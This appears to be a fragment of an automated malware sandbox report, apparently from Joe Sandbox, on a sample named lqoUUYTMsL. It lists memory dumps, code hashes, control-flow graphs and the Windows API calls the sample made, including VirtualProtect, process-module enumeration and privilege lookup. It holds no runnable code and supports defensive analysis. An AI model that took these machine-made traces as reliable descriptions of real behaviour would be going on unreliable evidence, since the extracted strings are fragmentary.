                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0ab67377ef6db6b37d1b7ac8786167222d601fee374c672d299573740579e0f
                      • Instruction ID: a9ce2e08392d968242acfb41ccb53605d67d12e6fb3e1c2a02133e5f204f737a
                      • Opcode Fuzzy Hash: f0ab67377ef6db6b37d1b7ac8786167222d601fee374c672d299573740579e0f
                      • Instruction Fuzzy Hash: 0C415471E016189BEB6DCF6B9D4078EFAF7BFC8210F14C1BA954DAA214EB301A458F11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 67e43573581d266fab3b7b7057aead1b16b8144740f7d4997f112d2893a3bbff
                      • Instruction ID: 1ce8dcebb676b73d0b700b5f56d5ccb35d3e51df19df59bfdecc0af8aacfed76
                      • Opcode Fuzzy Hash: 67e43573581d266fab3b7b7057aead1b16b8144740f7d4997f112d2893a3bbff
                      • Instruction Fuzzy Hash: 46315C71D0A7859FD71ACF76C84069ABFF3AFC6310F08C0BAD8449A266D7380946CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f730d3af4aa6b610c36433f66df0068f2fffc213fdb7b916b144d31c34f0b59
                      • Instruction ID: a7ab151b2e61ec246fcba6c62544951c3fb110f1d39eafd86abb7eff55abec27
                      • Opcode Fuzzy Hash: 3f730d3af4aa6b610c36433f66df0068f2fffc213fdb7b916b144d31c34f0b59
                      • Instruction Fuzzy Hash: 1B310AB1E016188BDB19CFAAD8443DEFBF2AFC9310F14C06AD409AB264DB740A45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b73287aed386d33eec8a028fea185ded068a06a953a49a0c549e1148123993c
                      • Instruction ID: 939ba75d324c2986319c4f5e9ce5d1d755c487bb440a0524f9fae846204e33d8
                      • Opcode Fuzzy Hash: 8b73287aed386d33eec8a028fea185ded068a06a953a49a0c549e1148123993c
                      • Instruction Fuzzy Hash: 732128B1E016188BEB18CF9AD8443DEFBF2EFC8300F14C12AD809A6254DB340A55CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f805394c5d59dd459bf6209103c0cb3e60a1faa12e9de09bc9d9dc08f61bd2f
                      • Instruction ID: db5bc0f0cdacb2c8d3119879397ea0d348b8b78a8161fcbf6e7b4099a541c5d6
                      • Opcode Fuzzy Hash: 9f805394c5d59dd459bf6209103c0cb3e60a1faa12e9de09bc9d9dc08f61bd2f
                      • Instruction Fuzzy Hash: A611DD71E016189BEB1CCFABD9446DEFBF7AFC8311F14C57AD909A6214EB3016418B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 259 56a1a13-56a1a14 260 56a1a7d-56a1ab4 259->260 261 56a1a16-56a1a34 259->261 270 56a1ab9 call 1a105e0 260->270 271 56a1ab9 call 1a10606 260->271 261->260 265 56a1abf-56a1b32 270->265 271->265
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: ($+&@*$zo{N
                      • API String ID: 0-3792228825
                      • Opcode ID: e280c4dcf3abb86b510969a7bf00d9fcf5b3186b1cadaa6fc2632e8205f2c1a1
                      • Instruction ID: 6dec42302c2e2bf13b76f60707f2b7b9fb55cf3d86c158422c774c59881baa17
                      • Opcode Fuzzy Hash: e280c4dcf3abb86b510969a7bf00d9fcf5b3186b1cadaa6fc2632e8205f2c1a1
                      • Instruction Fuzzy Hash: CA21E474A05229CBDB69CF20C9847D9BBB2BB49300F1085EAD909A7750DB319F85CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 423 56a150a-56a156d 429 56a1574-56a1575 423->429
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: xGYh$2'l
                      • API String ID: 0-2529050898
                      • Opcode ID: f5d6bc192c461d11474136c03887f71dc57fb4b0d041d940c3cd52981b40d426
                      • Instruction ID: db83f9524375a8d4c035ec283fbd9b4febb9bde0c1d209048c31d52f53540b92
                      • Opcode Fuzzy Hash: f5d6bc192c461d11474136c03887f71dc57fb4b0d041d940c3cd52981b40d426
                      • Instruction Fuzzy Hash: C1F0DA30A522198FCB65DB31C8557AEB3BAAF86204F5094E9840D6F744CE35AEC5CF05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 430 12daf58-12db00c 436 12db00e-12db016 GetExitCodeProcess 430->436 437 12db057-12db05c 430->437 439 12db01c-12db02e 436->439 437->436 440 12db05e-12db063 439->440 441 12db030-12db056 439->441 440->441
                      APIs
                      • GetExitCodeProcess.KERNELBASE(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DB014
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: CodeExitProcess
                      • String ID:
                      • API String ID: 3861947596-0
                      • Opcode ID: 1caf4405f430dd64e2854c65143e606e9b1374c36716e9ca8e7d3457ce556a99
                      • Instruction ID: 676782c3bd359e8e914a65deb27fde8837716275bab47a02813073422104b53e
                      • Opcode Fuzzy Hash: 1caf4405f430dd64e2854c65143e606e9b1374c36716e9ca8e7d3457ce556a99
                      • Instruction Fuzzy Hash: 2F315DB550E3C06FE7138B208C65B95BFB8AF47210F0984D7E984CF5A3D269A948C772
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 444 12dabec-12dac7e 449 12daccb-12dacd0 444->449 450 12dac80-12dac88 K32EnumProcessModules 444->450 449->450 452 12dac8e-12daca0 450->452 453 12dacd2-12dacd7 452->453 454 12daca2-12dacc8 452->454 453->454
                      APIs
                      • K32EnumProcessModules.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAC86
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: EnumModulesProcess
                      • String ID:
                      • API String ID: 1082081703-0
                      • Opcode ID: 5b24e97fa186b49e835d2645e1020d293f6fc44936d14529bca159a1cb1c83b5
                      • Instruction ID: 33d187ab7641bfba377a6afa3c31f0f4d0aa4065d2e2d7e29078db031503843c
                      • Opcode Fuzzy Hash: 5b24e97fa186b49e835d2645e1020d293f6fc44936d14529bca159a1cb1c83b5
                      • Instruction Fuzzy Hash: 2121D5B65053806FE7128F60DC45F96BFB8EF06324F0884DAE985CF193D224A909CB75
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 457 12dace5-12dad4f 461 12dad54-12dad6e 457->461 462 12dad51 457->462 464 12dadbb-12dadc0 461->464 465 12dad70-12dad78 K32GetModuleInformation 461->465 462->461 464->465 466 12dad7e-12dad90 465->466 468 12dadc2-12dadc7 466->468 469 12dad92-12dadb8 466->469 468->469
                      APIs
                      • K32GetModuleInformation.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAD76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: InformationModule
                      • String ID:
                      • API String ID: 3425974696-0
                      • Opcode ID: c48112fdf469b028a0b242025ddedd445a69740e6a5a6d817fe9425bf67cdd6f
                      • Instruction ID: 5c8700c8a36fc565ff0d7c653c5af022fe5df5abadd9fdf79ee357f31b660b62
                      • Opcode Fuzzy Hash: c48112fdf469b028a0b242025ddedd445a69740e6a5a6d817fe9425bf67cdd6f
                      • Instruction Fuzzy Hash: 5221B5715053806FE722CF55CC44FA6BFBCEF46220F08849AE985CB292D364E948CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 472 12daddc-12dae2f 474 12dae32-12dae84 K32GetModuleBaseNameW 472->474 476 12dae8a-12daeb3 474->476
                      APIs
                      • K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 012DAE82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: BaseModuleName
                      • String ID:
                      • API String ID: 595626670-0
                      • Opcode ID: 7626520139d8f84472774f1319e8012b25fac1767f623d7230fe15768b43321e
                      • Instruction ID: 4204bc33eb5367266123436f06160424bc99203e20b1c4238011a9eb5960f921
                      • Opcode Fuzzy Hash: 7626520139d8f84472774f1319e8012b25fac1767f623d7230fe15768b43321e
                      • Instruction Fuzzy Hash: 1A21BF715093C06FD312CB65CC55B66BFB8EF87210F0984DBD884DB6A3D624A909C7B2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 491 12da1f4-12da26d 493 12da26f-12da282 VirtualProtect 491->493 494 12da2a3-12da2a8 491->494 495 12da2aa-12da2af 493->495 496 12da284-12da2a0 493->496 494->493 495->496
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 012DA275
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: d48735b8f8ddbe58b1a0c9ddeabb93d5ac852d466d96149653d753b5f56aed86
                      • Instruction ID: 0087415342ebb9b4f23b1a2ec853813ff73bca1e59d23e9c90e202c5149f3aaa
                      • Opcode Fuzzy Hash: d48735b8f8ddbe58b1a0c9ddeabb93d5ac852d466d96149653d753b5f56aed86
                      • Instruction Fuzzy Hash: 2E21BE3540D3C09FD7238B25CC54A92BFB4EF07220F0985DBD985CB5A3D229A808DB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 499 12daa4c-12daab0 501 12daaf3-12daaf8 499->501 502 12daab2-12daaba FindCloseChangeNotification 499->502 501->502 503 12daac0-12daad2 502->503 505 12daafa-12daaff 503->505 506 12daad4-12daaf0 503->506 505->506
                      APIs
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 012DAAB8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: ede82a77692194bcfe7d36273948c8a3560fb483f40da96f0f0e98c73c7a4d1a
                      • Instruction ID: 35d9dd99b6504e54e0c2b990d6bd1a2472f94fa935571fbaf4a849e70a75ab77
                      • Opcode Fuzzy Hash: ede82a77692194bcfe7d36273948c8a3560fb483f40da96f0f0e98c73c7a4d1a
                      • Instruction Fuzzy Hash: 7121C3725093C05FDB128F25DC54B92BFB4AF47324F0984DAE9C58F6A3D2649908CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • K32GetModuleInformation.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAD76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: InformationModule
                      • String ID:
                      • API String ID: 3425974696-0
                      • Opcode ID: f8c03e7bf61acc87c82f6d886099364b15e1117b3fa702ba31c1afa4bfd158de
                      • Instruction ID: c11a98cb47881fa8000e347b307d62d0f1b047b4ff447ec800121a97c1468f5f
                      • Opcode Fuzzy Hash: f8c03e7bf61acc87c82f6d886099364b15e1117b3fa702ba31c1afa4bfd158de
                      • Instruction Fuzzy Hash: F8118175600240AFEB21CF55DC85FAABBE8EF04224F08846AED45CB695D774E9088BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012DA7E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: fd6c9a07ad25d94417e6c4bcdce5ec1f77eed5c2befa5848eb773465d8f4f055
                      • Instruction ID: b9292d28a3fc7364c5bc39b9fbcfb25a0fbb1759d9073610a386e63d91d9263b
                      • Opcode Fuzzy Hash: fd6c9a07ad25d94417e6c4bcdce5ec1f77eed5c2befa5848eb773465d8f4f055
                      • Instruction Fuzzy Hash: 3A2172716053805FEB22CF29DC44F66BFF8EF46620F0884AAED85CB652D225E804CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • K32EnumProcessModules.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAC86
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: EnumModulesProcess
                      • String ID:
                      • API String ID: 1082081703-0
                      • Opcode ID: 0415d940d7c6bb84b7675f30f9e7029194f2b395b9f9dd253a0add4a7ecd7edf
                      • Instruction ID: a9ff27cacd8c9f52e2873416c422c2936dac25fd1082966be91a001455e0343e
                      • Opcode Fuzzy Hash: 0415d940d7c6bb84b7675f30f9e7029194f2b395b9f9dd253a0add4a7ecd7edf
                      • Instruction Fuzzy Hash: 0111C471600240AFEB21CF55DC45FAAFBE8EF44324F08846AED45CB651D374E9088BB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetExitCodeProcess.KERNELBASE(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DB014
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: CodeExitProcess
                      • String ID:
                      • API String ID: 3861947596-0
                      • Opcode ID: 4efbf231829cc32139c75af7b80720c747cd1c9ae60918257b5bb615276d27d8
                      • Instruction ID: 111d2b449a52d1d1f2f5b7e9aac708c1cb7e7cb8d9627097e77cb835fdb9348f
                      • Opcode Fuzzy Hash: 4efbf231829cc32139c75af7b80720c747cd1c9ae60918257b5bb615276d27d8
                      • Instruction Fuzzy Hash: F311E371600240AFEB21CF15DC45BAABBD8EF05224F0884AAED44CB681D774E9088BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 012DA690
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 70fa1141321ced256d0dc85ad7c2f05d794075037c539502bfd365e2cdeee3c1
                      • Instruction ID: 03466fe291f0b1e262784984ac361b173321ac2eafe5dd4bda554cac52dba047
                      • Opcode Fuzzy Hash: 70fa1141321ced256d0dc85ad7c2f05d794075037c539502bfd365e2cdeee3c1
                      • Instruction Fuzzy Hash: 801191755093809FDB128F25DC94B52BFA8DF46220F0884EBED858B657D275A908CB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012DA7E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: 8f32f02c8cfee8cba8eeb98f409d109d5b8915603701c60ec83b57087a781853
                      • Instruction ID: 9580d7baa3c7be668b145238d1311cbbf957509f3136b52053b6a6c39ac9fd1a
                      • Opcode Fuzzy Hash: 8f32f02c8cfee8cba8eeb98f409d109d5b8915603701c60ec83b57087a781853
                      • Instruction Fuzzy Hash: 9F1165726102419FEB14CF69DC85B6AFBE8EF04620F08C4AADD46CB792D374D504CA71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(?), ref: 012DA484
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 1b6be3158577754994e01d678d3ce8f6d15e08462ee70da2f5d2dc1e7bc03ec1
                      • Instruction ID: 34d29893f02c43cf284ae94d9a7b2090fd30fb82f5cd598d938b60fbf2eb2917
                      • Opcode Fuzzy Hash: 1b6be3158577754994e01d678d3ce8f6d15e08462ee70da2f5d2dc1e7bc03ec1
                      • Instruction Fuzzy Hash: E41184754093C4AFD7228F15DC48B62FFB8DF46624F0880DAED858B653D275A908DB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 012DAE82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: BaseModuleName
                      • String ID:
                      • API String ID: 595626670-0
                      • Opcode ID: 3f02b3d110fdaf7bbf7dcbef9d9f6c40a6bf8629f0a25dae79f3052cc8e96afa
                      • Instruction ID: 4320c029ae8fff4344d594c906daf6bc84d9384382127b1c1684e727cf1a75dc
                      • Opcode Fuzzy Hash: 3f02b3d110fdaf7bbf7dcbef9d9f6c40a6bf8629f0a25dae79f3052cc8e96afa
                      • Instruction Fuzzy Hash: 51017171600200ABD314DF16DC45B7AFBE8FB88A20F14855AED489BB41D735B915CBE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 012DAAB8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 1ee7d5c2059ef8e7fedc07e1aa922db75decd053033019a35baebefcd03ff4ee
                      • Instruction ID: 025c09675c55182436e6a93a6729fb2ab806324f7d14026ea890e87caa5be15e
                      • Opcode Fuzzy Hash: 1ee7d5c2059ef8e7fedc07e1aa922db75decd053033019a35baebefcd03ff4ee
                      • Instruction Fuzzy Hash: 3A01D4716002408FDB10CF19D985B66FBE4EF44220F08C5AADD498B652D2B4E448CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 012DA690
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 3b270373b3304e9a40b815b2c19ba7620c782600ce099b93ddf3ba67aac81786
                      • Instruction ID: b0c5acc3833111102c248ca943594b8fd20fd849c7b2b00fc0036436f1ddf137
                      • Opcode Fuzzy Hash: 3b270373b3304e9a40b815b2c19ba7620c782600ce099b93ddf3ba67aac81786
                      • Instruction Fuzzy Hash: 5701DF71600240CFEB10CF59D885B66FBE4EF44220F08C4AADD498B656D2B4E408CEA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 012DA275
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: ff7df494aa7b1fd9716ad6f2b3eaf1b1238460f80c56e54db62b65dd44f763b4
                      • Instruction ID: 00273da706465360c081435d8717f3e8b60ea43429464d8618928e85c0075e0b
                      • Opcode Fuzzy Hash: ff7df494aa7b1fd9716ad6f2b3eaf1b1238460f80c56e54db62b65dd44f763b4
                      • Instruction Fuzzy Hash: 9601D4755142409FEB218F5AD889B65FFE4EF08320F08C0AADD464B652D376E418CF62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(?), ref: 012DA484
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: fd34a2e79bd274a7f2e331e45e737bbb00e01f054d7fbc0613c9287ad4ef1da5
                      • Instruction ID: a534a8a20ac4e7e6821dd41685c2b3f377cdea6bbc9f8aa0116a720ff26043bd
                      • Opcode Fuzzy Hash: fd34a2e79bd274a7f2e331e45e737bbb00e01f054d7fbc0613c9287ad4ef1da5
                      • Instruction Fuzzy Hash: 41F0AF755142809FDB20CF05D88AB66FFE4EF04228F08C1AADD494B752D3B9A408CAA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656066500.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: true
                      • Associated: 00000000.00000002.1655933278.0000000005600000.00000004.08000000.00040000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1655933278.000000000565D000.00000004.08000000.00040000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5600000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: ILc
                      • API String ID: 0-871475565
                      • Opcode ID: 075172f32d45c210fdddcc2e02e100c961fdb29103d1bca4fed9412a9586a385
                      • Instruction ID: 4611cf3c75eecee65f3cdf689f251b7e796ca2af61729310c00c83f5886fe15d
                      • Opcode Fuzzy Hash: 075172f32d45c210fdddcc2e02e100c961fdb29103d1bca4fed9412a9586a385
                      • Instruction Fuzzy Hash: 8F51CFB8E04209DFCB44CFA5D9949EEBBB2FB48310F10952AE815AB354D730AA46CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: u>T
                      • API String ID: 0-1605843629
                      • Opcode ID: ee3a6dbdfe9456ce78c8ee73e72698934b6b6b2f6e94804e6a204d6688e0a5bd
                      • Instruction ID: ad868612c9ba0ea4712c235f0160e6e890be9db7c183ef37dbdcc8aeaca3cfb7
                      • Opcode Fuzzy Hash: ee3a6dbdfe9456ce78c8ee73e72698934b6b6b2f6e94804e6a204d6688e0a5bd
                      • Instruction Fuzzy Hash: B63128B8E04209DFCB44CFA5D5809EEBBF1FB49304F1491AAD815A7714D738AA45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: u>T
                      • API String ID: 0-1605843629
                      • Opcode ID: 54c7a80490e826450917c17787dfbbf11c9b9defea4bc8916cf4c7dd9215bbec
                      • Instruction ID: 636d64c17832bdd631683bba0b65b31083fcf0dde191d13cb891a3c4c8d90d0c
                      • Opcode Fuzzy Hash: 54c7a80490e826450917c17787dfbbf11c9b9defea4bc8916cf4c7dd9215bbec
                      • Instruction Fuzzy Hash: B13105B8E04219DFCB44CFAAD5809EEBBB1FB89300F1091AAD815A7714D738AA41CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: <
                      • API String ID: 0-4251816714
                      • Opcode ID: 668a7720d328d8dc967a38888ceb0c0d4af18026f4e7983dfd9093c3d57eeba5
                      • Instruction ID: ee4989471844b8fa239903692735e3acd31ba2530d39199bc9f3777a446e7a01
                      • Opcode Fuzzy Hash: 668a7720d328d8dc967a38888ceb0c0d4af18026f4e7983dfd9093c3d57eeba5
                      • Instruction Fuzzy Hash: F301ED75D422A9DFCBA4CF50D94879DB7B1AB05351F8099DAD40B6B350DB309E80DF10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2'l
                      • API String ID: 0-2456924062
